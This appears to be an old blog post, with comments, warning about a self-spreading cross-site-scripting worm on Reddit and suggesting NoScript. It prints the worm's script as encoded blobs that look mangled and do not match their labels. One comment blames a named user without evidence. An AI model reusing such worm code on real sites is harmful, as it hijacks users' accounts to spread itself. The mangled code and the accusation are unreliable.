XSS Attack on Reddit

SMS Text

Playing around in Reddit tonight I found several threads being attacked by what appears to be an XSS (cross site scripting) virus. If you go to these threads and view the code being put out by the script, it will take over your commenting and replies for the thread outputing the same code.

The best thing to do now if you are a Reddit user is to install No Script for Firefox.

Update: From Reddit

They seem to have converted some javascript code into html escaped characters and got the browser to interpret it somehow. When I open my received messages it instantly tries to post a reply to every message on that page thus spreading itself.

Edit – there was a submission to programming earlier today (I think) that I can no longer find that had a similar if much less sophisticated attack. That one relied on people being stupid enough to copy and paste the code into the brower address bar. I suppose someone found an exploit and used his idea.

Decoding the script which is URL encoded gives us this;

[[code]]czo1Mjg6XCJbeF1bYl0NCltiXTovWw0Kej1cXFwiW3hdW2JdXFxcXG5bYl06L1tcXFwiK3RoaXMuaW5uZXJIVE1MK1xcXCJdKC9vbm1vdXNlb3ZlcntbJiomXX09ZXZhbCh1bmVzY2FwZSggICAgdGhpcy5pbm5lckhUTUwpKS8vKVxcXCI7DQpvPWRvY3VtZW50O2U9by5nZXRFbGVtZW50c0J5VGFnTmF7WyYqJl19bWUoXFxcJ2FcXFwnKTsNCmZvcihpPTA7aSZsdDtlLmxlbmd0aDtpKyspaWYgKGVbaV0uaW5uZXJIVE1MPT1cXFwncmVwbHlcXFwnKSQoZVtpXSkue1smKiZdfWNsaWNrKCk7DQpvPWRvY3VtZW50O2U9by5nZXRFbGVtZW50c0J5VGFnTmFtZShcXFwndGV4dGFyZWFcXFwnKTsNCmZvcihpPTA7aSZsdDtle1smKiZdfS5sZW5ndGg7aSsrKWVbaV0udmFsdWU9ejsNCmU9by5nZXRFbGVtZW50c0J5VGFnTmFtZShcXFwnYnV0dG9uXFxcJyk7DQpmb3IoaT0wO2kme1smKiZdfWx0O2UubGVuZ3RoO2krKykNCmlmIChlW2ldLmlubmVySFRNTD09XFxcJ3NhdmVcXFwnJmFtcDsmYW1wO2VbaV0uc3R5bGUuZGlzcGxheSE9e1smKiZdfVxcXCdub25lXFxcJykNCiQoZVtpXSkuY2xpY2soKTsNCl0oL29ubW91c2VvdmVyPWV2YWwodW5lc2NhcGUodGhpcy5pbm5lckhUTUwpKS8ve1smKiZdfSkNClwiO3tbJiomXX0=[[/code]]

Un-encoded it looks like;

[[code]]czo4OlwiW3hdW2JdDQpcIjt7WyYqJl19[[/code]]

Seems like the comment spam detector is removing the vast majority of it. Don’t be suprised if reddit goes down from this though.

  • Serhiy

    Thanks… my roommate was freaking out that he had contracted a virus… we went on an all out virus hunt to find nothing… Any more info you can provide for this would be very helpful, we will also post this on reddit.

  • FrancisBacon

    The person responsible for this is none other than jcm267, formerly of Digg.

  • http://www.myhtmlworld.com Sunil

    I wrote something like this – Iframe attack on websites – Please have a look http://www.myhtmlworld.com/personal/iframe-attack-on-websites.html